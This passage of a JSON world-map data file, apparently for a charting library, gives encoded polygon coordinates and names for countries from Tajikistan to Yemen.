ũɜØÀ§ê«ΈƮЀqłZĐ¨~êdƊWJ©{ƗǖɕğĩĘȹȌÉɄĶ҆ǗèܟȌǹȑŹ_TċÒÑʻr÷E±ΗćăPuløÌb[ÁX©`ĽtćQƟ­˅šȧȧ࠯˧œŰćʂŲڂ}pÃAćsÏIb®ɄÝŘѧĬˋ̅ǟŵ]²ķGč¿çÍœnƏǏ_őÑÇkó~ĝ]é»µ¥Qí¨ȁƔ£RuK}Ua[]Y·T­Sʁķó£]©oo£RŧÓġnĻüÙĞÔ`ȰҊ،əɘϢοÊŘʑîÌȾʘƀشíƨʪȖÎÁŤƖ˻Þը~Ë̴Ŵǚ̚ġׂ͆̌ʿ͉˳ʀƷʲ\"]],\"encodeOffsets\":[[[72361,40812]],[[72662,41205]]]},\"properties\":{\"name\":\"Tajikistan\",\"childNum\":2}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@¥GקȌǭˉɃIǵQřŕ½ÕƯщŃ¯ñ˝Ǉˑŗ؛ƓƗĥțÝĹ¹ƛā͉íǿǬϿ¬ɵǔçSSȼċĠºǶýϞٹKɹ˚ԝʒŹɐСƢүcށʶƇȲمƙƙݟ{ЙɯǙʵڇŃചƏɔ̱ŎƯÛầ̰½ŋĸ^Ȯнà¢ǵșɾÏ̂Ǯ՞ǜǵЄKɈƛѐµŢ̬fǖԝϖʓԊ՝oǍıŽɝѕ̙ӤӀ̰ࣄǀ؞̵Ӥ֙Ҙt࢔·ĎòŻю˜ɢѰÈǸʢϐǁ˓ˢ˚ĦĮٞϣՌĥȧɒƛĿ\\\\̟̬ƭڎɈò΀ƵӤय઀ۅҞƷબا̞LՔɏãǛ]ƽAşXġ\"],\"encodeOffsets\":[[68119,38245]]},\"properties\":{\"name\":\"Turkmenistan\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@΄ŶƋȧȷò\"],[\"@@ěʤŞp¤ŮǱU]ĢɌʜǠÔਨĮ̆Ŧˤĝ͋ʓ౏һ˷ȣ\"],[\"@@ÇƟÓŜŔ\"]],\"encodeOffsets\":[[[127014,-9565]],[[128070,-9740]],[[128662,-8335]]]},\"properties\":{\"name\":\"Timor-Leste\",\"childNum\":3}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@êßőǥƀǜ¿\"],[\"@@īAĎÚ^×\"]],\"encodeOffsets\":[[[-179365,-21677]],[[-178128,-19086]]]},\"properties\":{\"name\":\"Tonga\",\"childNum\":2}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ݥÅ΀ǘlˮơĬ؞ĺĭƝl҇\"],\"encodeOffsets\":[[-62476,10378]]},\"properties\":{\"name\":\"Trinidad and Tobago\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ȡbpŴɮÅ»ď\"],[\"@@ŻÑŎŜnÉ\"],[\"@@ƇȅĐ֯ſǟŅŽ́ƃʛ२ÁȼĭϜׯЄȃјȡİ˽Ҟiؚ̦պȶĘèĴÛϜ״šŶͦ˄qĔतͺŴOƣĴ˒£ĆΣĴ¥բ˺ÔǕձחĪʍΎɅĮͥίҿӓͯÍȉɌ˟΄TƥȢĦʤˉ¯¹ʪÉCuǅOËKɇäıD©}¹ŭËǃõƍëƭû¯¹ƍûŏǋǛ§\"]],\"encodeOffsets\":[[[11221,34532]],[[11549,35588]],[[10522,32446]]]},\"properties\":{\"name\":\"Tunisia\",\"childNum\":3}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ʩ@ɀĐªď\"],[\"@@N£ʂ͙ŷȥĆ̗ԼïД˱¤«ȕĲṶ̈̄̅ȾғvϙŶ©ȧΩ͈ǓaɳȄŧ{ůp½PÁFǡıÛ¡JÎNŴa hďXƩùƇHӫŠŽƋ SėĥƯķągĸ iL^Qěéơ£঳·ɉõιƷˣñƹŧkȽAǛ^şCӗǬʇěƽ§ǑÅóğHŝRķEã¦²ƑıT}qÛ§ǏQ£Ċȉɕ¿yƗũÅ¡ĕuCƇà×Nçͦ͆̊ŝɄտ˯׃ȰࡑՓݳūΕŰ̗֛̐ɠשÄǕԃٍħϹƘɇ֑͠ĆʇƫÆİՋҪĴȦǔࠕ©ŲȠϻдƀÊRɈ߉ʢŴ̪ȞʱЂĮȥ~ťȒɂƬǗØżƟƪǼɎډçWĐäΞҴΈҠ²ǆŕɆRĶ¬ĭĎŤĬowĵ࢜jȁŦƞĆݠŊءƬʄᄚħǠǲ܊Έࣚʎ଴½ɌĚŰŗƦƋɖāв¢̖΁̺öʎƯ૆ɓ࢜ƶ۶ũیʦ˦ƌĄĀǈà}QĒÂҒ±ĎĴpXbPÚNÔM]ÑîsŴĩüng}mXy¬Ȓ\"],[\"@@ҐnƸΑܠ˗čȅڅÔ֡ěȭʉУǃӍΟ¨ȪҐʾֽ_ÉĮʘȒAʆʚƎǘɕĬîŶtÐ~¨dɨvêƶd¨b¨[ưŏ\"]],\"encodeOffsets\":[[[26594,41100]],[[44476,42144]],[[28135,42954]]]},\"properties\":{\"name\":\"Turkey\",\"childNum\":3}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ĝʮʌǏ˟\"],[\"@@ÜǳûÇʣʀńϚǀϝ\"],[\"@@īҍđÚvψǈl\"],[\"@@Ḯ႗ϝപ৏ΕୃÎɗ֠׉ɏгCɧŢsZǕŗεŮнǄȿìڵبϵЋ̙ƟûۡɉзȷӑĴǏʉƷāƙͥŦ֡ŝī_¾ýÒƝêŁDŻŉÉgũfȡRȉGmĬÎĭ¬ƓɖºʎćҪȽђ˙Ȥęƥ߿ɚƏîہɦqĦhËjŧMįĔěŶć ɱIĝ¼ÛÞ½öğʀ˃զÿɎčƔęĺŧĦƍĤõÚĳȈ¥äŢuŮVºĘǄV¬YÔ©ŶǙѢeìDÂà˶A ˆKȔŰϠպ͈͠jƄ}ŎÑPėõd¹rmfQ¨¤ň£¬dzüǀhvFÂp¸T OÈvÖlĺWĊÞKͼ§Ė©¾ß|ĽƆÞN¢bTHŸXÎÊZ^GlG౶@ಀ@\"]],\"encodeOffsets\":[[[40665,-8168]],[[40445,-6322]],[[40822,-5023]],[[34717,-1026]]]},\"properties\":{\"name\":\"Tanzania\",\"childNum\":4}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@BµF«WίͩĕŔȽ«ŠతǼʹRː઺਎ÛȎϓƼİ͢ûǎŸ̰Ëè˂ʜͪĝɂŀ˴ʁǘƾ֌ƤаĿâ´ƢƢȠȢƀ˥®gk³ĒãłHǋP¯ǍϪַm¿æ̗ZǙAţƫЋˇǝÑƥȿəǽγধ౿@౷@iF]JÉYÍÕeáNSG\"],\"encodeOffsets\":[[31243,-1092]]},\"properties\":{\"name\":\"Uganda\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@Ś£ӯĒ¯Įцƛ\"],[\"@@֝aؽ̡ȡ¤؛śڿѥɠƤ¥Ɗ͉ɁƢЩκ͓״Řͼ¹Ƴ˟ѭ¹ͯþ͓ʝԯåһ˫ϫƔĖҜ࢟ʲঀҘÏŲƏȑİ؍ûթǖƪŰϟľڲáǼŠ҃vʇӐĨҿ˹^ĦƇůԙÛӝֻӹŧÞϱřĢƏ¤Ʊaˡħĥj]ol˱ªő°ėĔ¬^Ǆh^°mþÐÐĘ¶¾¸TîĢĊÒrÞ¤¿Ħ[ÖEÀǀÌE^eHŁhEȠÞ͈ēTǔd²ǧĬVðPČq¸ʱŖĭˠˏǔSЌםƶéEړˬˏę˟@­`ǧýkƩ}ɻȥɇsȁȋkСƽͳǨߙÄȁKǥĂÁFəŝěƌƽrˡɰķCVƎŸİĀǀŔƄ^ʸRšø³̰¶Êˤʘ֦ДɖĲĸHðćǊČÂγπ§ǸþĮîGÖ[ðxLŰÖźĢèþத²ࠨŷƮaĸNÌQżŽͦqTāƆĪ֢}Êg¤ïcKĲĜàl¨Tx¢vDȴȵۄĄʐǡƶæiªSÄ¼yÄ¨þìŀôæú¶ŔĀȦHņ°ȒFǄM̠§ˀɎદ֎ӃɵďþΣ܌©ȼƇɼ֥ѴцǗڬǞԾЭǲŎֈȑɎԘʅʦJz˙Ρȱˊƽǯ[ŭǻǆ£ĺɯƭ͍݇ѿȵŻѥ\"]],\"encodeOffsets\":[[[32781,47313]],[[39132,48222]]]},\"properties\":{\"name\":\"Ukraine\",\"childNum\":2}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@½ɤĄĴĤ¾öJÌ´Õ˴mxfÈĸʎΦ˹Ά͝gŻ\\\\óŌTȸǲrNs͒͹è²ϖǥ̵̰Ϫǝƈ̃А˫õëăęíéó·{g¿@ПƊñ£«Ï¿Ɨǩțŋ͏ʑ؝ə٫ƂӛĿޝϖօqӏӄؘʀʎŘǆĂàŴHÖÂYÈjÊGÄyÀlªŀĔìǆjàŠȄrücƖÚà\"],\"encodeOffsets\":[[-59198,-31599]]},\"properties\":{\"name\":\"Uruguay\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ʥ¸ƕ֮ȔɞWɘՐɿͨЁٷљ\"],[\"@@Ľ_ÝžƜOō\"],[\"@@ǬhʎǍΙŷÑǒǽŮĦðĊđ\"],[\"@@т»ŭĉα´ÞĒ\"],[\"@@ƐűЋXƍɢʼĮƎȵ\"],[\"@@ȣmƱŎǮƴȒGiʋ\"],[\"@@ýMǨ¤ĩ\"],[\"@@Ǖƿ˖ͤĿǣ\"],[\"@@ș֊`͂Ǻࢋ\"],[\"@@b×ɡժɀӑ\"],[\"@@ǳĠŌèş\"],[\"@@ǫU͊ČƝõ\"],[\"@@ıkƂĘë\"],[\"@@¨ÕůJĽŮȆá\"],[\"@@ǩĄưZzĝ\"],[\"@@˪©ɓ»ÕĦ\"],[\"@@ũeź¶Ьˏãǫ\"],[\"@@įŵŦǼuÅ\"],[\"@@ÏÃ֬Şઓ΁ۑÓŖǮʲņߖÔ̐Ɗȣƕ\"],[\"@@ɉlǈĢÂō\"],[\"@@ˍcǶĊĘå\"],[\"@@ĕmĪƺSƋ\"],[\"@@ȋĦƌĦĽ\"],[\"@@ĭpŌþÿ\"],[\"@@Ǆȝ̝ʪĨƆð÷ŻÅľÓ\"],[\"@@úśüķ٦ŕŨåˤúĴXΠ»˰ŏðƃÈ@˾tԲȳ̀ŖǠNÍૼœࣞʴՔȯҊǳ҈ǱࡪΓӨȫǎãǮ̙ȌˊHŪΗ̦ŬĹĻƫ֢ʣ̲ƝÈɛ̆ౙ©ą̗܋Ӄ̽ɱϞʧɂ@ϸǶϼǶЖŨپĲࣘ͐ɐƈÅÔöę̢Ɯ¼Ƃ´ŀɘNܦEٶ@ՒԪ̰ȎΘʮͼǖȠ|ĊJᥬFǄʄϴgӌՔʐڬٞيǊĨǷלŔήɛJଗ̴ĽÈίȰGŚ˻ǡŷկĉǽǉāĲʣJçȽɻæ¦Țϵӫʛ÷ðÇđ{ĨŽȅƁêǵõҭבăȳǺǝηʕʶđˀЅΦÎȩɞŎYŌį|ʅשţưϽȋhɌĹÃĳĪŏΓ୵ÿࢿ҅Ĭʮĉǎ˭˱͕ʖŇěԣ^Ǣؕ࠭Ƈ©¶ǐՃ̂Đʦ̊ǎ˝ŷƽǅǐҡʮ˅ĉƽŰƑݩੱȸˆҲǇdO͠ǉçǵƀBƐȺtǑŐŅ£ƢŦƉČǎŊčĠêļɸ¼ŅŌĎïØˋə­æ÷ƭųŦţŋ½ƐבʃȲR×˞ϙѵʬmćģŸșǞКȕʏYȻȐJڂϵãǽůNԱОҾзȴćǷř|«ĥʭȚЊϟį»ȗȘԳĜӠſƺɵШ`Ϻࣿ΍۸ƹƢ̣˟ƔCŏķ×˧čƥǶPɫրZ[ɻȖɨĂį]ǑͱʗˇóŖƏďʡĆѶɏɟɻʓƐĂŉȘëʎ¤Ă­ßýܙȫĭņǡ̷ȯƫ́sȖ¹ɏͣLλǋ̑Еƈ¥ɧѻ̇ŅnOţΟƕɫXƈ÷ėœȇƈĞțΙ˱ ùǋȽìMǥƭþõŹÃ×ͭɢࡑ؎વ½ǵň̷ŹɶF̄ñƫJȞűƮǿזೕÛࠋ̝ԓՁûsƠǐơĔɁ϶̍ŶȱюŊǔǯœvΆȕĥǕǰɯτʸ̨ɧĎÄƽōÉčŘǈ࢔ࢗ࢐̋ƬɟÕƁ޻ȑāò@ÚĊëİ˓ȸÔƒŵĵחȜ˦NőòߍŹǺüWŜơġǗǏxČƣŇ͑Ǻ¼ȃ͸Ľ˝٧¤ΓÏɣƯҋǠǥùåřȦģπŦÖ±ųğƸēȘŤ ȏ̯ǙפΕŝƻãÄşčÇǴ׹̀ĘǛƅșƕǆ̹ƏҏƂŞ|ćȸɟQ͇ʀȯŗ¨ęƩޏȆյ­]Ɋ£ʓܳʯȞƐɃAǞɿŔ˧͕Ϳ߯ЍȊŦοǇĪȀɁɉĭćäÅȏˉ§`éĚĝ̝ůŤƕų˻ˡňÚƛǪ¥ÍɩĴЙʐѱȕ÷ปӚ̉Ԣ£ЮړټϩܖֻԂۡẴĳɷ҉ɵǽ߉͚ͥʔЋࠀঙڰʡˊ๟XEϙᛟIẗসĢǨ፹Ƴ˵٘ԧΪˣlăɰՙĂϱʴܿ¬ƏĞ[ҘǕòǺ͑ɂӿռÐѪӳ̚ĕˮ®Ɍ̀ˏ˃МÒ ڐ¤ܱöŅˋΉȔÇÇúǪڗװōܲѱԂʈࣶϽଔ݈͠Ȃཔ»դ٨ÅȵİԛRz˚Ċơ´ȒȉǠɨĎɥÔwåȥעʉˆ¡΀ؠǱࡄāǐÂĺɋĹţ°ˉ΁ǼlŧOfâѠφţʳĈˍǅÙ»ĲǗǓ˜ÿɖ¡ΎƈȐɳŰĞŒɕƠƢaƐ£ĞĽb¸ÇŞ୎@෤@Ϊ@Ψ@ܒ@੼@。@。@　@੼@ܒ@Ϊ@ܒ@ȤAN͆ʨÅM¶ɋ\"],[\"@@Á¹ÁĜń¡\"],[\"@@ƯnÔüƳŜѲÛȡƩ\"],[\"@@ѭ_ҼȔǳ\"],[\"@@Šŋёōɚ͎Ęĳ\"],[\"@@ȉØļ¨ĎĿ\"],[\"@@ƑjΚǚɇȃ\"],[\"@@Ѿ³ڿƁÚτZ\"],[\"@@ŽBŲĬƀ·ųµ\"],[\"@@ԱYࠪǎŇĎɢĔļ«Ùțҳč\"],[\"@@ˏ̼ú«ŕ\"],[\"@@ԾƉсċυƼˊÚ\"],[\"@@िћͲͪʺ´þǼϮPŗƍ\"],[\"@@ȲĈŢÅ˃ǧǆ«зȃޯŷըȐĶƠǨ«ÊÊ̩ČÌň̪Ä¶ė\"],[\"@@ǹa}Ĭǎǚęů{\"],[\"@@VŰŤóŹ»\"],[\"@@ŕìƜ¬ŗ\"],[\"@@ĆƑʞūɱÈ௹ˇÁǂ΄ʤ֠Ť˦Ë\"],[\"@@đāÔƚ~×\"],[\"@@TǇəŚvȨȐƹ\"],[\"@@̕ǥ°ǚʈŴ^ŧ\"],[\"@@ȴCóǩ؉Զ˨ùȢˍ\"],[\"@@[ßƣØǀH\"],[\"@@ŎÆÆǏʵÒɔ÷\"],[\"@@́ɱñȒδ \"],[\"@@ƟRŦĂzē\"],[\"@@ǫʁɓǞ˃ȱëɂȆΒ̘ľɬȑfȩ\"],[\"@@̨gĚȕоǏΦΏ˵ĨĵķǶTǰɑȘ_õеࢭԪƈÌÙǌիǐςŖŉĬ̷Ñǲƴǌ\"],[\"@@ɉĀŐĦɮųƏ\"],[\"@@iƓŻ[̹ŲɾΜˀɇŕ\"],[\"@@ħ²ǰćó\"],[\"@@ʀƃ£Ļø\"],[\"@@ǛĘȒɲǿƭ¥\"],[\"@@ɂǍǯѯȫ§Ę͊ʏ͎ȘĀźñ\"],[\"@@̶ÕɅÙ³ʙǬƞ˫˛еҶԦK\"],[\"@@̯ÓöŐ̈́ĉy\"],[\"@@̌Տ½уʣʬĈƈϓŤŌǤɉȈ̛ȫUɬ̾ɈДƷ\"],[\"@@ЀD­ĹɢŃǑĹѹɘŹԁĳϫƣøû͓ƵȠǲϙźăȇ˫ѴҶǤά̃ŹҶ̔ōɪÄ´ƪʼÙ¡Õ\"],[\"@@İɅɢŐ͢ğ_Ǖ̱¡̠¢ȱՏƼŅȷǿvփѴȺȺƬķ¦Č̪ \"],[\"@@φcΖџЁΔ͌׉ԕʹ|τνܼȲǋ\"],[\"@@ϊ¥āōǗÖįʏzˣƙϟĀ;ǮǢeÍŚΦ³\"],[\"@@ų´Ȭà÷œ\"],[\"@@ǱüΔńǡǿ\"],[\"@@ȿWǊĊ¶ñ\"],[\"@@ŌӲΐƊs׹ѧ\"],[\"@@;ÍŚͳҳűࠫȴʟǖԌV̢ƒ˺B\"],[\"@@ʖѡřëŔʸ\"],[\"@@ŇɭēĸȜŶ\"],[\"@@іƃͻ|ΉȪʰġ\"],[\"@@ή¯آĂضʳ۴¿ćԓʽǷţƔࡻ˔ڃÿī̐ʄ¿\"],[\"@@@݁@௯@݃@௯@݃@௯@݃@ӫȪȦÖæЖĭʠŪψVžH@Áµě¡õˈřҨ˭،͓ÔʻèYƊîŶ¬˂ĠȠDĦʶǂjŀԴľˮ^ˈƑĜʑɢõʆǅÂÍĤ÷֠̅ɬɽɰɱϜϗĜýŢŋÎÝ¡­·ÅƴŀkÕąȨÃǝ̒ۖʗƠÂĝˆ[ìƃǙޥ̣ɋɱǓ̌ʤƈ͇դĂņفǱǗ˻ơÄ©ż̨΀ʘ ˱ʙƮգՖաĮƵЂ҂ÛΙɢ˺̩ ƍãʷȒżϒ˧ʇӉȄӳߺśǻΌߧЙƔ˛WũΠǼÜǅqŏƦÛʃٙɨÏƉϐÃŊǇɒ_Ɛűҟǫ޽˴ࠃӬ੏̤ɔƞBɌȎ˽ÆǬȞ`ϋƪࠧʩࠩǊ@Ǹɗŭੳń৛åŔ׹ƺǮˬҵʏճĈȊƢݩàƮèȷðƀ˄ºങȇĩàɈɂӹƅCǥǱwʦŵ͑ƻѪîž÷ϻзۯTŅĜǟ˯ĭŲñƳǡ ǉǽ΅G˝ˁȽ¨үģǱÜÆĸРŊ̔Ɍ͹Ĺ͹ŎϨвϖޒʨମŭࠓʜԶˢҗȃՕl࠙ˑߓ׷П~̬ʡҩŽĲŏҹ¿ѳЭٔǑgǣ܍ϙŧٕť٩ϕփǩǋ̋ງӗřĻɶįȓőñĺǕǓ؝ƩŗƹģǺؓʭݏƓ½ŢȰ~˅ÚҳЕʿñȳǎȿǅɉĢWůǡÝ´ʂ̺Ø৬װМĪˈwęęǞŏĆĮΒÅȻǜȦʶ୒ӌȲó^ȶ˸ɒЌȖ͒kȟƢð̺ΖŤʛºƘҤ˄ƔͰ˩ɍࢣɛʿȤàŲ̂m˻ĦɋƇŋj҃Ƌ؁ьȿùωȚݑɃĩŉڅsΞŴäˆ˱ŸϊӽאϬΌ؇ΩĪɻटǁϳĄݑԔ˝Ҥ̎Фķ­ƭ̼ƤɨƧʸƖСĆː¤ƍÈȵĕवÌȸƮΉ¶LĘʕơʡȞfǜʵT_Ė̠ɧĜϺÈāȘњ̼ξpƚǴǟïMʜΒĦqƺϺ˜ĹķğȞøǼ¹֔Ȃ˶ɚʸÛܾĘ˒ɖǫζхƶҸŨÜƪɱƜՇğࢡχͫɸºȓӍƒ੟œএň˳ŪÆǖљȘ٬ňਹŘֹȢහФ٦Yũǀ૆ɨ۔[ɋBŝ̡˴ō๘ДȪΞýïŪڝÞՃͦƴŤ٪ЧଠŇǊх¶҅ıϫŰŘːຽèӿшᖉن΀ÆƞϮঔEনżဤજǉƛࣞŤ݊ʌɂʿ¨Ȁάx׍ĢʹŶ̮üÂŉૼĤ௄Ң@ĭݠƝӉǉƤïڴɎࠆʡ߲Ōذ§ɐÑƓǃՊ»Ƨĝᖨ¤ೂʃཐµՀŵဖĞіéદ͉;E@݃\"]],\"encodeOffsets\":[[[-159315,19469]],[[-160613,21272]],[[-160242,21435]],[[-160986,21725]],[[-161586,21972]],[[-163197,22459]],[[-82989,25311]],[[-82311,25746]],[[-99502,26788]],[[-82111,27934]],[[-93996,30209]],[[-86945,30355]],[[-91365,30807]],[[-121188,34187]],[[-122924,34733]],[[-122759,34898]],[[-77357,36086]],[[-75912,40634]],[[-74250,41970]],[[-71657,42256]],[[-72202,42370]],[[-72951,42488]],[[-69823,45397]],[[-125331,48533]],[[-125514,49313]],[[-97078,50179]],[[-180517,53036]],[[-182148,52890]],[[-181399,52958]],[[-180831,53112]],[[184042,53152]],[[181674,53128]],[[-177718,53388]],[[-176603,53527]],[[-178869,53284]],[[177893,53617]],[[176960,54286]],[[-171995,54626]],[[-170614,55195]],[[-169821,55369]],[[-169534,55436]],[[-166193,56164]],[[-167399,56301]],[[-163343,56476]],[[-134491,56402]],[[-163709,56452]],[[-136050,56212]],[[-164177,56666]],[[-164541,56643]],[[-136504,56877]],[[-159299,57161]],[[-134122,56821]],[[-136771,57692]],[[-135966,57598]],[[-135283,57456]],[[-157909,57872]],[[-173829,57995]],[[-135932,57883]],[[-137205,58210]],[[-136567,58372]],[[-156679,58496]],[[-138209,58728]],[[-156567,59212]],[[-138987,59643]],[[-137912,59558]],[[-156074,59761]],[[-156145,59889]],[[-164781,59983]],[[-151574,61507]],[[-151281,61249]],[[-170122,61833]],[[-149907,61901]],[[-151202,61902]],[[-176888,61909]],[[-175578,65168]],[[-144386,70425]]]},\"properties\":{\"name\":\"United States\",\"childNum\":76}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@§QûD«TæBbëĄÂfE´ÍŰmſ\"],[\"@@d´fĂèhiGo࢟ӹҬƝńƧɀÓǂ@Ā{`ZZǦƺt¸Ƥó´s]ÆđjĭäOĀmÂn¤[b¯LývWŴ|ʜƣЊѹʫǝªYųɏXρʋ͛Ŕˁ_ʱɿƸ͊˴̋ˀׁ̙ͅĢųǙÌ̳է}˼ÝƕÂţȕÍƧʩسîʗſËȽʒí ŗπÉϡɚɗ҉؋_ȯÓMx«xýI÷ÙQĹ£ĽtŃČȭʱoWĢBŠ^ƾäǜՓɐ̝KફبҝƸ੿ۆӣरͿƶɇñڍ̫Ʈ[̠ŀɑƜȨՋĦٝϤĥĭ˙˔ˡϏǂǷʡѯÇ˛ɡżэčñ࢓¸AᶢᓢҼᏠউࠜݷৼŘਢÝϴƎӺͻʴεʠĨùࠡЪUǰۅਐdƪƗÅȁȴŹʀXɈӎҤຘۖ\"]],\"encodeOffsets\":[[[72916,40850]],[[72650,43263]]]},\"properties\":{\"name\":\"Uzbekistan\",\"childNum\":2}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ÿŊňÒǛ\"],\"encodeOffsets\":[[-62642,13474]]},\"properties\":{\"name\":\"St. Vin. and Gren.\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@Ñäźļ®ķŕç\"],[\"@@ķǦĈíÅ\"],[\"@@ËȳСĂǄĖƺíưŊ\"],[\"@@|SwÌǷͯΏɷeғˏ˧ĉɏ¸ʩśŧΥЙַ̎]Ɲǔ͑\\\\ǱŖĴɛϖΥƦ࣭ւùɋӛȋǑ͵ݱΟ̳ΕéEžƃŠ͇ǕʋeѻϦ˫খ΃ͺȫ@ҢԺ̍ϖǋզ~ٚ̎ֈOɀ̓ĠԧŏߣםۤԛŘ͡ē݅Ǜ˴ɝźèٚɳ˺ŋКɗŴʵÅ̠ԄŘמừψ̤ʒЂ՜ǐ՗ʕĸ͉ǌƩõeŘ˱ѥۻв٣͆Ħƀǀ̜ω۞tδਤ΄ŖŮʖWǖ́¡ÿɘìǲǖä̼וڮ¡ήɫĒЅƀǑཤŞͪ̿؈ƿɼz֌̠Ϧџ§þ᎚ĘсǍ҃]Ȓȯ¯ȝǆŨȖΗČČÊ»CƂâG˺˿}ƶƬäڞ҃ȗǥȋү̷E˄ƽцƴՒrŴÉƼȱcµĭ³s}ĝЗȫǣɷĤǷuğ¦±¼W¶nÖC ]h_H}÷³˕ƫΫÕµęnÙ~ÇA½pƝÅßãóġ^ǬțǶȥǲȡ\"]],\"encodeOffsets\":[[[-62461,9081]],[[-62280,9358]],[[-65381,11399]],[[-62199,5327]]]},\"properties\":{\"name\":\"Venezuela\",\"childNum\":4}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@Ƽʷ£ļþ\"],\"encodeOffsets\":[[-66320,18222]]},\"properties\":{\"name\":\"U.S. Virgin Is.\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@̥ƙ˼Ǹj\"],[\"@@ĹmŸŊ}ě\"],[\"@@ǗĽÔƨń©\"],[\"@@ҿȉ±ȕǃęЙªÐɟǟǩnœӵϟ̥ࠇɢϵԢұgȑĝx௴ணǒRڔߟМ౫ӝŸ˗j̗ğŶĭėðɉĉrOׅƅŏ«ɋݡσÿƩث˓ɉɚ·ɕȃŖķÏŖi`űʗF˒Ƴǅɍϫ̦άэãſչψˠͿTǓ֗ʭ͕ϵ́łŲÝ²vڮȪ͞ʁǨśȥȮΤļǒƖAǮɨÇúĚ̌ĈŁʼÍEȲʯɎI˺žļͤÑ^ɘʊ~њ˚ƲĨĖ֔Ŋ΂ɯׂǀӠIĨV®iqÄÚÞ¾ÒhÆ°µæĕØķĂ·¸ĩƸpƠê~HüϹʺĲeV©éġƄYƜO²oÞțɜɛǖ˃˔ēȸÏĀ¹Ü˿Ʉwú¶ĶD੉ռHtĄ°ÀWæêfzFǔNʊ×PžŖ¶è\\\\ÊĨĪBÄòűFkh_ÂIĹĕVqbÒ®t¨üȟƤŻþÿϹȽƟêɅ¼ęªȁʼÂĊΒĕ®{ÔcQwõÝCáȔϣЌ¤¼ªƜȮÄіʫ̂˔ƔƳņǌ˒ȭǜɔȔąˆĲƬ˄ΊǬӊΡʰ¢Ōĥɚ¨ȨŉȕɷĨѭʶ¯͊˅΄Ǵū\"]],\"encodeOffsets\":[[[106562,10641]],[[110102,21429]],[[110186,21727]],[[110564,22025]]]},\"properties\":{\"name\":\"Vietnam\",\"childNum\":4}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ŧéŉŮ~ŌȴǏ\"],[\"@@̇Ì|ȒņZǆʷ\"],[\"@@ŞŹ»đ̭ôĪƄƢT\"],[\"@@ɟsƖʾš\"],[\"@@̯ĜȠŮŐɉ\"],[\"@@Τ̓͗ėčʹǓØ¢ǐŖÞƯ\"],[\"@@ȥ_ˠƚùŹ\"],[\"@@Ä˥ɠȆŀэęř˯§ŃȎÁٜƬƹ\"],[\"@@ŻgĈĄ²àĳ\"],[\"@@ąĲöâPǓ\"]],\"encodeOffsets\":[[[173560,-20009]],[[173399,-19394]],[[172489,-17963]],[[172490,-17181]],[[172336,-16728]],[[171431,-16482]],[[171942,-15806]],[[170748,-15182]],[[171607,-14603]],[[171509,-14240]]]},\"properties\":{\"name\":\"Vanuatu\",\"childNum\":10}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ϧœŨϊmŲƕ\"],[\"@@ƀȁ¡ĳʻZȱɲϐª\"]],\"encodeOffsets\":[[[-175569,-14383]],[[-176469,-13788]]]},\"properties\":{\"name\":\"Samoa\",\"childNum\":2}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@Τv˘ġ͍ǉ·͹ǶȀƶȔß\"],[\"@@ÇĖþ½\"],[\"@@ÿÌºtą\"],[\"@@ُ̕Ź˱ʧݧίဇӳֳӳ֭Cӧ͗ԳǑोŃԳѭΝBԥǫ̷Řūɋӌ¨ΨǋˌŹެãǎǕČŢĀçˠĺ̈́˸̬ˊv֜ȒƂмǇਚĒ͚Ŀ৊ȼʽƖMʤƒŚ˲ӾתܶΦូΒजጉ\"]],\"encodeOffsets\":[[[55054,12941]],[[43783,14034]],[[43815,14307]],[[54360,17048]]]},\"properties\":{\"name\":\"Yemen\",\"childNum\":4}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ɡǘÐÊę\"],[\"@@ƾӋÃ౑ӯǶŅóĳřʇεH̹ÜM°ĻŀǓǰŁǐ³ɰ]ǺHYŐlǴxŤ~NôyòLźyΤVĠD̏଍ȽΟߙٍ଩࿋౫ફହݫկȧԻnșʣӑ¾ƩǏșIݭƴίõ׵Òʷ·ϧʭੑùё˓؇ƞĺțŤɡ[áʀɃuȧğƄæІӧݞĪĴƆǜȴīٚܧઢͭ࢔ǭͨʕ͢ʶƒ¶nŌü¶¶ļŎďƞŗöέܨǁ܎«ìÊƚȐƄφļ@Ţ@ᲄϜ̵̦٥ŷ۝ĊęߤP¨ĆȈØä²łǈɈƜÞ¦ɾ֦ɪƚȬEъʹÚsȊMŚğݐ[ʰĀͦޒĶČɠ¶°͒˼ɀ֎ֶήͮΐՊǴĘðÊĮİÆȠhZBʈ Ȭʎěɨɂ̦Uļú³ɐࣣɈ·\",\"@@Ɯ˳͞ˑʮÒĚɜ̈́ɊlϜǨȀŶŒ²ŀĺíȖ֧ђYģkȩïůßĿÿȉÇχӡȥęŘ˅\"]],\"encodeOffsets\":[[[38766,-48070]],[[32563,-24465],[27847,-30659]]]},\"properties\":{\"name\":\"South 